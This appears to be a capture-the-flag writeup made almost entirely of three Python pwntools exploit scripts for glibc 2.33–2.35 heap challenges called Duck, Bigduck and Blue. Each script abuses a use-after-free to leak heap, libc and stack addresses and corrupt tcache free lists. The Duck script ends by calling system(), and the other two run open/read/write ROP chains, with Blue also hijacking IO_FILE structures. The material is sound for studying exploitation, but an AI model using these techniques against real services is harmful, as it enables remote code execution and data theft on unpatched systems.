Duck
2.34的uaf,简单粗暴,通俗易懂
from pwn import*
# Connection setup: the target host/port is hard-coded to the contest network;
# the commented-out process() line is the local-testing alternative.
r=remote("192.168.166.196",58013)
#r=process('./main')
# debug level logs every byte sent and received (including the leaked addresses).
context.log_level='debug'
# libc.so.6 shipped with the challenge: every libc.sym[...] lookup and every raw
# gadget offset used later is relative to this specific build.
libc=ELF("./libc.so.6")
def new():
    """Send menu option 1 (the allocate action, going by the helper's name).

    Waits for the ``": "`` prompt and answers ``"1"``. No size or content is
    exchanged, so the remote side presumably uses a fixed chunk size.
    """
    r.sendlineafter(": ", "1")
def delete(idx):
    """Send menu option 2 (the free action, going by the helper's name).

    Answers the first ``": "`` prompt with ``"2"`` and the following
    ``": \\n"`` prompt with the decimal chunk index.
    """
    r.sendlineafter(": ", "2")
    r.sendlineafter(": \n", str(idx))
def show(idx):
    """Send menu option 3 (the print/show action) for chunk ``idx``.

    The caller is responsible for reading the data the service prints
    afterwards; this helper only drives the two prompts.
    """
    r.sendlineafter(": ", "3")
    r.sendlineafter(": \n", str(idx))
def edit(idx,content):
    """Send menu option 4 (the edit action) and write ``content`` into chunk ``idx``.

    Prompt sequence: option, index, length, then the raw bytes. The length
    sent is ``len(content)``, and the data is sent with ``send`` (no trailing
    newline), so ``content`` is written exactly as given.
    """
    r.sendlineafter(": ", "4")
    r.sendlineafter(": \n", str(idx))
    r.sendlineafter(": \n", str(len(content)))
    r.sendafter(": \n", content)
def xor_ptr(ptr1,ptr2):
    """Return ``ptr2 ^ (ptr1 >> 12)``.

    This is the shape of the pointer encoding glibc (>= 2.32) applies to
    single-linked free-list entries, with ``ptr1`` as the address the pointer
    is stored at and ``ptr2`` as the pointer value.
    """
    key = ptr1 >> 12
    return ptr2 ^ key
# Exploit chain for "Duck" (glibc 2.34 per the heading). str and bytes are
# concatenated below ("a"*0x18+p64(...)) and bytes are padded with a str
# fill ("\x00"), so this appears to be a Python 2 pwntools script -- TODO
# confirm before running it under Python 3.
for i in range(10): new()
delete(0)
delete(1)
show(0)
# Two qwords read back from freed chunks; XORing them yields a heap address
# (the pattern matches the encoding xor_ptr reproduces). 0x2a0 is a layout
# offset hard-coded for this binary.
ptr0=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))
show(1)
ptr1=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))
heap=(ptr0^ptr1)-0x2a0
success("heap: "+hex(heap))
for i in range(2,8): delete(i)
show(7)
# Leak taken relative to main_arena; the extra 0x60 is specific to the bundled libc.so.6.
libc_base=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-libc.sym["main_arena"]-0x60
success("libc_base: "+hex(libc_base))
# Stores the encoded address of environ in freed chunk 6.
edit(6,p64(xor_ptr(heap,libc_base+libc.sym["environ"])))
new()
new()
show(11)
# environ points into the stack; 0x168 is a hard-coded distance to the slot
# the final write targets -- presumably a saved return address, not
# verifiable from the script alone.
stack=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-0x168
success("stack: "+hex(stack))
delete(10)
edit(10,p64(xor_ptr(heap,stack)))
new()
new()
#gdb.attach(r)
# Final write: 0x18 bytes of padding, two raw libc offsets (0x2daa2, 0x1b4689
# -- valid only for the bundled libc build) and the address of system().
edit(13,"a"*0x18+p64(libc_base+0x2daa2)+p64(libc_base+0x1b4689)+p64(libc_base+libc.sym["system"]))
r.interactive()
Bigduck
2.33的uaf配沙箱,泄露environ然后ROP
from pwn import*
# Connection setup: the target host/port is hard-coded to the contest network;
# the commented-out process() line is the local-testing alternative.
r=remote("192.168.166.196",58011)
#r=process('./main')
# debug level logs every byte sent and received (including the leaked addresses).
context.log_level='debug'
# libc.so.6 shipped with the challenge: every libc.sym[...] lookup and every raw
# gadget offset used later is relative to this specific build.
libc=ELF("./libc.so.6")
def new():
    """Send menu option 1 (the allocate action, going by the helper's name).

    Waits for the ``": "`` prompt and answers ``"1"``; no size or content is
    exchanged, so the service presumably allocates a fixed size.
    """
    r.sendlineafter(": ", "1")
def delete(idx):
    """Send menu option 2 (free) followed by the decimal chunk index ``idx``."""
    r.sendlineafter(": ", "2")
    r.sendlineafter(": \n", str(idx))
def show(idx):
    """Send menu option 3 (show) for chunk ``idx``; the caller reads the reply."""
    r.sendlineafter(": ", "3")
    r.sendlineafter(": \n", str(idx))
def edit(idx,content):
    """Send menu option 4 (edit): index, then ``len(content)``, then the raw bytes.

    The final step uses ``send`` rather than ``sendline`` so no newline is
    appended to ``content``.
    """
    r.sendlineafter(": ", "4")
    r.sendlineafter(": \n", str(idx))
    r.sendlineafter(": \n", str(len(content)))
    r.sendafter(": \n", content)
def xor_ptr(ptr1,ptr2):
    """Return ``ptr2 ^ (ptr1 >> 12)``.

    Matches the free-list pointer encoding used by glibc >= 2.32, where
    ``ptr1`` is the storage address and ``ptr2`` the pointer being stored.
    """
    key = ptr1 >> 12
    return ptr2 ^ key
# Exploit chain for "Bigduck" (glibc 2.33 per the heading). The heading
# mentions a sandbox, which is presumably why an open/read/write chain is
# built instead of calling system(). str and bytes are mixed below
# ("flag"+...+payload), so this appears to be a Python 2 script -- TODO confirm.
for i in range(10): new()
delete(0)
delete(1)
show(0)
# Two qwords read back from freed chunks; XORing them yields a heap address
# (the pattern matches the encoding xor_ptr reproduces). 0x2a0 is a layout
# offset hard-coded for this binary.
ptr0=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))
show(1)
ptr1=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))
heap=(ptr0^ptr1)-0x2a0
success("heap: "+hex(heap))
for i in range(2,8): delete(i)
# Writes a single byte into freed chunk 7 before leaking it -- presumably the
# low byte of the stored pointer, so the leak lands at a known arena offset.
edit(7,"\x10")
show(7)
# __malloc_hook+0x80: fixed distance to the leaked arena pointer for this libc build.
libc_base=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-libc.sym["__malloc_hook"]-0x80
success("libc_base: "+hex(libc_base))
edit(6,p64(xor_ptr(heap,libc_base+libc.sym["environ"])))
new()
new()
show(11)
# environ points into the stack; 0x168 is a hard-coded distance to the slot
# the final write targets -- not verifiable from the script alone.
stack=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-0x168
success("stack: "+hex(stack))
# Raw gadget offsets, valid only for the bundled libc.so.6.
pop_rdi=libc_base+0x28a55
pop_rsi=libc_base+0x2a4cf
pop_rdx=libc_base+0xc7f32
# open(<path at `stack`>, 0, 0) -> read(3, heap, 0x30) -> write(1, ...).
# write() has no pop_rsi/pop_rdx before it, so it appears to rely on rsi and
# rdx still holding the read() arguments (heap, 0x30) -- fragile if the
# libc read() clobbers them.
payload=p64(pop_rdi)+p64(stack)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(libc_base+libc.sym["open"])
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(heap)+p64(pop_rdx)+p64(0x30)+p64(libc_base+libc.sym["read"])
payload+=p64(pop_rdi)+p64(1)+p64(libc_base+libc.sym["write"])
delete(10)
edit(10,p64(xor_ptr(heap,stack)))
new()
new()
#gdb.attach(r)
# The NUL-terminated "flag" path is placed first, at the address passed to
# open() above; the ROP chain follows it.
edit(13,"flag"+"\x00"*0x4+payload)
r.interactive()
Blue
目测是最新的libc-2.35,仅有一次show和uaf机会
没有malloc_hook,free_hook和exit,而且传统的IO_file_jumps被放在了不可写段上
利用方法:https://kagehutatsu.com/?p=655
from pwn import*
# Connection setup: the target host/port is hard-coded to the contest network;
# the commented-out process() line is the local-testing alternative.
r=remote("192.168.166.196",58012)
#r=process('./main')
# debug level logs every byte sent and received (including the leaked addresses).
context.log_level='debug'
# libc.so.6 shipped with the challenge: every libc.sym[...] lookup and every raw
# libc-relative constant used later is specific to this build.
libc=ELF("./libc.so.6")
def new(size,content):
    """Send menu option 1 (allocate) with a decimal ``size`` and raw ``content``.

    Prompt sequence: option, size, then data. The data is sent with ``send``,
    so ``content`` goes over the wire exactly as given (no newline appended).
    """
    r.sendlineafter(": ", "1")
    r.sendlineafter(": \n", str(size))
    r.sendafter(": \n", content)
def delete(idx):
    """Send menu option 2 (free) followed by the decimal chunk index ``idx``."""
    r.sendlineafter(": ", "2")
    r.sendlineafter(": \n", str(idx))
def show(idx):
    """Send menu option 3 (show) for chunk ``idx``; the caller reads the reply."""
    r.sendlineafter(": ", "3")
    r.sendlineafter(": \n", str(idx))
def uaf(idx):
    """Send the undocumented menu option 666 followed by chunk index ``idx``.

    The author named this helper after the use-after-free the heading says
    the challenge grants once; what option 666 does on the server is not
    visible from this script.
    """
    r.sendlineafter(": ", "666")
    r.sendlineafter(": \n", str(idx))
def xor_ptr(ptr1,ptr2):
    """Return ``ptr2 ^ (ptr1 >> 12)``.

    Matches the free-list pointer encoding used by glibc >= 2.32, where
    ``ptr1`` is the storage address and ``ptr2`` the pointer being stored.
    Defined here but not called in the "Blue" script.
    """
    key = ptr1 >> 12
    return ptr2 ^ key
# Exploit chain for "Blue" (glibc 2.35 per the heading, which also notes the
# malloc/free hooks are gone and the IO vtables sit in a non-writable
# mapping, and defers to an external writeup for the method). Every raw
# constant below (0x222060+..., 0x222f60, 0x151990, 0x8e22e, 0x5b4d0 and
# the gadget offsets) is libc-relative and hard-coded for the bundled
# libc.so.6. The allocation/free counts are tuned to this allocator's
# caching behaviour and are not verifiable from the script alone.
for i in range(9): new(0x88,"\n")
for i in range(8): delete(i)
for i in range(7): new(0x88,"\n")
new(0x18,"aaaaaaaa")
show(7)
# Skips the 8 'a' bytes so the qword read next is the one following them.
r.recvuntil("a"*0x8)
libc_base=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-libc.sym["__malloc_hook"]-0x70-0x80
success("libc_base: "+hex(libc_base))
pop_rdi=libc_base+0x23b6a
pop_rsi=libc_base+0x2601f
pop_rdx=libc_base+0x142c92
gadget=libc_base+0x151990
# Stage one: alarm(0) cancels any pending timer (presumably set by the
# challenge binary), then read(0, libc_base+0x222060+0x980, 0x200) pulls in
# the stage-two payload sent at the end of this script. Ten qwords = 0x50 bytes.
payload=p64(pop_rdi)+p64(0)+p64(libc_base+libc.sym["alarm"])+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(libc_base+0x222060+0x980)+p64(pop_rdx)+p64(0x200)+p64(libc_base+libc.sym["read"])
for i in range(11): new(0x78,"\n")
for i in range(8,17): delete(i)
uaf(18)
delete(19)
delete(18)
# Three rounds follow, each with the same shape: seven 0x78 allocations, one
# allocation whose content is a libc-relative pointer, two more allocations,
# then one whose content is the data meant for that location. Targets, in
# order: 0x222060+0xf00, 0x222060+0x908, _IO_2_1_stdout_+0xd0.
for i in range(7): new(0x78,"\n")
new(0x78,p64(libc_base+0x222060+0xf00))
new(0x78,"\n")
new(0x78,"\n")
new(0x78,"flag\x00\x00\x00\x00"+p64(gadget))
for i in range(8,15): delete(i)
delete(15)
delete(17)
delete(18)
for i in range(7): new(0x78,"\n")
new(0x78,p64(libc_base+0x222060+0x908))
new(0x78,"\n")
new(0x78,"\n")
# Five qwords (0x28 bytes) + payload[:0x50] = exactly 0x78 bytes, the chunk
# size. payload is 0x50 bytes long, so the slice takes all of stage one.
new(0x78,p64(libc_base+0x8e22e)+p64(libc_base+0x222060+0x908)+p64(0)*2+p64(libc_base+0x5b4d0)+payload[:0x50])
for i in range(8,15): delete(i)
delete(15)
delete(17)
delete(18)
for i in range(7): new(0x78,"\n")
new(0x78,p64(libc_base+libc.sym["_IO_2_1_stdout_"]+0xd0))
new(0x78,"\n")
new(0x78,"\n")
#gdb.attach(r,"b _dl_addr")
# Inlined allocation: unlike new(), it does not wait for the third ": \n"
# prompt before sending. Presumably the stage-one read(0, ..., 0x200) is
# what consumes the data at this point rather than the menu handler --
# not verifiable from the script alone.
r.recvuntil(": ")
r.sendline("1")
r.recvuntil(": \n")
r.sendline(str(0x78))
# Stage two: open(libc_base+0x222f60, 0) -- presumably where the earlier
# "flag\x00..." write landed -- then read(3, ?, 0x30) and write(1, ...).
# Neither read() nor write() sets rsi here, so both depend on whatever the
# previous libc call left in rsi (and write() on rdx too); this works only
# if that happens to be a usable buffer address -- fragile.
payload=p64(pop_rdi)+p64(libc_base+0x222f60)+p64(pop_rsi)+p64(0)+p64(libc_base+libc.sym["open"])
payload+=p64(pop_rdi)+p64(3)+p64(pop_rdx)+p64(0x30)+p64(libc_base+libc.sym["read"])
payload+=p64(pop_rdi)+p64(1)+p64(libc_base+libc.sym["write"])
r.send(payload)
r.interactive()